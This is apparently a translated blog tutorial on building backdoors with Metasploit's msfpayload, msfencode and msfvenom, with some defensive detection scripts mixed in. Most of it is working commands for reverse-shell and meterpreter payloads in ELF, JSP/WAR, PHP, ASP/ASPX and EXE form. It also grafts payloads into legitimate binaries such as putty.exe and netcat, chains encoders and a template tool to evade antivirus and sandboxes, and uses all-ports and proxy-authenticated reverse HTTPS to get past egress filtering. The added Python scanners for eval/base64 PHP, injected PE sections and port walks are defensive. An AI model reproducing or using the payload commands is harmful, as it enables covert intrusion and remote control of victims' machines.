Contents
msfpayload and msfencode parameters
2 Backdoor types that can be generated
2.1 Generating a Linux backdoor with msfpayload
2.2 Generating jsp and war backdoors with msfpayload
2.3 Generating a php backdoor with msfpayload
2.4 Generating asp and aspx backdoors with msfpayload
2.5 Generating an exe backdoor with msfpayload
3 msfpayload tips
This article covers generating backdoors with msfpayload and encoding the payload with msfencode so that it evades some antivirus products.
msfpayload and msfencode parameters
Run msfpayload -h to see the available parameters:
Usage: /opt/metasploit/msf3/msfpayload [] [var=val]
OPTIONS:
-h Help banner
-l List available payloads
#O -- show payload information
#R -- output raw data, which can be piped to another program such as msfencode or redirected to a file
#C -- output a C program
Run msfencode -h to see the available parameters:
root@bt:/opt/metasploit/msf3# msfencode -h
Usage: /opt/metasploit/msf3/msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff' //characters to avoid
-c The number of times to encode the data //number of encoding iterations
-d Specify the directory in which to look for EXE templates
-e The encoder to use //which encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders //list all available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file //output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war //format of the output file
-v Increase verbosity
-x Specify an alternate executable template
root@bt:/opt/metasploit/msf3# msfencode -l
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
Backdoor types that can be generated
Many formats can be generated, including asp, aspx, php, jsp, war and exe; not every method described below was tested individually.
Generating a Linux backdoor with msfpayload
root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.7.102 LPORT=5555 X > linux2
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {"LHOST"=>"192.168.7.102", "LPORT"=>"5555"}
Run linux2 on the target machine and listen on the port locally, with either metasploit or nc; the test is shown in the figure below:
The payload can also be bound to an existing executable so that both run, for example netcat:
root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
[*] x86/alpha_mixed succeeded with size 204 (iteration=1)
For a more advanced payload such as meterpreter, the pipeline is the same with the payload name swapped; run msfpayload -l | grep linux to find one that suits you.
Generating jsp and war backdoors with msfpayload
root@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=10.1.1.1 LPORT=5555 R > door.jsp
Generating a war-format backdoor:
root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=5555 W > door.war
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {"LHOST"=>"10.0.0.1", "LPORT"=>"5555"}
root@bt:~# unzip door.war
Archive: door.war
inflating: META-INF/MANIFEST.MF
creating: WEB-INF/
inflating: WEB-INF/web.xml
inflating: sbkuvbujlbr.jsp
inflating: sWDYKoedyqBMERb.txt
root@bt:~#
Generating a php backdoor with msfpayload
root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e php/base64 -t raw -o base64php.php
[*] php/base64 succeeded with size 1779 (iteration=1)
If the file does not begin and end with the PHP delimiters, add them manually by editing base64php.php with gedit/vim; without them it will not work. As shown in the figure:
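From the defender's side, the php/base64 output above has a very recognisable shape: a single eval() wrapped around base64_decode(). The scanner below is an added example, not code from the page or from Metasploit; it finds such sites in PHP source, decodes the blob, and reports which network or process functions the decoded code names. The sample file is constructed here and its inner code is a harmless stand-in.

```python
import base64
import re

# Constructed sample in the shape the php/base64 encoder produces: one eval()
# over a base64_decode() call. The inner code is a harmless stand-in that only
# names a network function so the second check below has something to find.
INNER_CODE = "<?php $f = 'fsockopen'; echo 'constructed sample'; ?>"
SAMPLE_PHP = "<?php eval(base64_decode('%s')); ?>\n" % base64.b64encode(
    INNER_CODE.encode()).decode()

EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]*)['\"]\s*\)\s*\)")
# Functions a decoded blob would need for a reverse connection or command execution.
SUSPICIOUS = ("fsockopen", "socket_create", "proc_open", "shell_exec", "passthru", "popen")

def scan_php(source):
    """Return one finding per eval(base64_decode(...)) site, with the decoded
    length and any suspicious function names seen inside the blob. Works with
    or without the <?php ?> delimiters the text says may be missing."""
    findings = []
    for m in EVAL_B64.finditer(source):
        blob = re.sub(r"\s+", "", m.group(1))
        blob += "=" * (-len(blob) % 4)          # tolerate stripped '=' padding
        try:
            decoded = base64.b64decode(blob, validate=True).decode("latin-1")
        except (ValueError, UnicodeDecodeError):
            decoded = ""                        # not valid base64: still report the site
        findings.append({
            "offset": m.start(),
            "decoded_len": len(decoded),
            "functions": [f for f in SUSPICIOUS if f in decoded],
        })
    return findings

if __name__ == "__main__":
    for hit in scan_php(SAMPLE_PHP):
        print("eval/base64_decode at byte %(offset)d, %(decoded_len)d bytes decoded, "
              "calls: %(functions)s" % hit)
```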
Generating asp and aspx backdoors with msfpayload
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t asp -o door2.asp
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t aspx -o door.aspx
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
Generating an exe backdoor with msfpayload
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 > /root/Desktop/door.exe
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 -k -x /root/putty.exe -o /root/Desktop/puttydoor.exe
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 10 X > shell.bin
root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=10.0.0.1 LPORT=4443 EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t exe -o door.exe
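Two tell-tales of a payload grafted onto a legitimate executable such as the putty.exe template above are a section that is both writable and executable, and an entry point that sits in the last section instead of .text. The triage script below is an added example, not code from the page or from Metasploit; it parses the PE32 headers with only the standard library and reports both signs. The two images it checks are constructed in-memory headers with no real code, one with a normal layout and one with an extra RWX section that the entry point has been moved into.

```python
import struct

SEC_EXEC, SEC_WRITE = 0x20000000, 0x80000000   # IMAGE_SCN_MEM_EXECUTE / IMAGE_SCN_MEM_WRITE

def build_pe(sections, entry_rva):
    """Build a header-only PE32 image (constructed test data, no code inside)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                      # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 14 + struct.pack("<I", entry_rva) + b"\0" * 204
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), size, rva, size, 0, 0, 0, 0, 0, flags)
        for name, rva, size, flags in sections)
    return dos + coff + opt + table

def entry_point_anomalies(pe):
    """Return human-readable findings for the two injection tell-tales."""
    e_lfanew = struct.unpack_from("<I", pe, 60)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return ["not a PE file"]
    nsec = struct.unpack_from("<H", pe, e_lfanew + 6)[0]          # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]     # SizeOfOptionalHeader
    entry = struct.unpack_from("<I", pe, e_lfanew + 24 + 16)[0]   # AddressOfEntryPoint
    findings = []
    for i in range(nsec):
        fields = struct.unpack_from("<8sIIIIIIHHI", pe, e_lfanew + 24 + opt_size + 40 * i)
        name = fields[0].rstrip(b"\0").decode("latin-1")
        vsize, rva, flags = fields[1], fields[2], fields[9]
        if flags & SEC_EXEC and flags & SEC_WRITE:
            findings.append("section %s is writable and executable" % name)
        if rva <= entry < rva + vsize:
            if not flags & SEC_EXEC:
                findings.append("entry point 0x%x in non-executable section %s" % (entry, name))
            if nsec > 1 and i == nsec - 1:
                findings.append("entry point 0x%x in last section %s" % (entry, name))
    return findings

# Constructed samples: a normal layout, and the same binary with an extra RWX
# section appended and the entry point moved into it.
CLEAN = build_pe([(b".text", 0x1000, 0x2000, 0x60000020),
                  (b".data", 0x3000, 0x1000, 0xC0000040)], 0x1100)
INJECTED = build_pe([(b".text", 0x1000, 0x2000, 0x60000020),
                     (b".data", 0x3000, 0x1000, 0xC0000040),
                     (b".xyz", 0x4000, 0x1000, 0xE0000020)], 0x4010)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN), ("injected", INJECTED)):
        print(label, entry_point_anomalies(img) or ["no findings"])
```

The same checks can be run on a real file by passing open(path, "rb").read() to entry_point_anomalies; packers such as UPX also produce writable-executable sections, so treat a hit as a reason to look closer rather than a verdict.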
msfpayload tips
When the target is on an internal network, commonly chosen payloads include:
root@bt:~# msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o allports.exe
root@bt:~# msfpayload windows/meterpreter/reverse_http LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o httpports.exe
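The reverse_tcp_allports payload above leaves a distinctive trace on egress firewalls: one internal host trying consecutive ports, one after another, against a single destination until one is allowed out. The detector below is an added example, not code from the page; it parses constructed firewall log lines (the field layout is assumed) and flags any source/destination pair that walks an unbroken ascending run of ports within a time window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall log lines (assumed layout, not from the page): one host
# walking ports 1..31 against a single destination, plus ordinary traffic.
LOG_LINES = ["2024-01-01T10:00:%02d src=10.0.0.5 dst=192.168.1.6 dport=%d action=deny" % (p, p)
             for p in range(1, 31)]
LOG_LINES += ["2024-01-01T10:00:31 src=10.0.0.5 dst=192.168.1.6 dport=31 action=allow",
              "2024-01-01T10:01:00 src=10.0.0.9 dst=192.168.1.6 dport=443 action=allow",
              "2024-01-01T10:01:02 src=10.0.0.9 dst=192.168.1.6 dport=80 action=allow"]

LINE_RE = re.compile(r"^(\S+) src=(\S+) dst=(\S+) dport=(\d+) action=(\w+)$")

def parse(line):
    """Split one log line into (timestamp, src, dst, dport, action)."""
    ts, src, dst, dport, action = LINE_RE.match(line).groups()
    return datetime.fromisoformat(ts), src, dst, int(dport), action

def detect_port_walks(lines, min_ports=20, window=timedelta(minutes=5)):
    """Return (src, dst, first_port, last_port) for every pair that hit at least
    min_ports consecutive ascending ports inside one window; denied attempts
    count too, since the walk is visible before any port gets through."""
    attempts = defaultdict(list)                      # (src, dst) -> [(time, dport), ...]
    for line in lines:
        ts, src, dst, dport, _ = parse(line)
        attempts[(src, dst)].append((ts, dport))
    alerts = []
    for (src, dst), events in attempts.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            ports = sorted({p for t, p in events[i:] if t - start <= window})
            if len(ports) >= min_ports and ports == list(range(ports[0], ports[0] + len(ports))):
                alerts.append((src, dst, ports[0], ports[-1]))
                break                                 # one alert per pair is enough
    return alerts

if __name__ == "__main__":
    for src, dst, lo, hi in detect_port_walks(LOG_LINES):
        print("port walk: %s -> %s, ports %d..%d" % (src, dst, lo, hi))
```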
Antivirus sandbox evasion with ultimate-payload.pl
$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \
| ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe
[*ultimate] Waiting for payload from STDIN
[*ultimate] Payload: read (size: 367)
[*ultimate] Payload: encode (new size: 1161)
[*ultimate] Template: read 94720 bytes from file
[*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928
[*ultimate] Output: add the begin of the template (size: 36928)
[*ultimate] Output: add the encoded payload (size: 1161)
[*ultimate] Output: add the end of the template (size: 18502)
[*ultimate] File '/tmp/payload.exe' generated (size: 94720)
reverse_https with basic authentication against proxy
msfvenom -p windows/meterpreter/reverse_https_proxy_basicauth \
-f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername \
PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe
The generated payload can also be packed, for example with UPX.
https://www.0x255.com/archives/64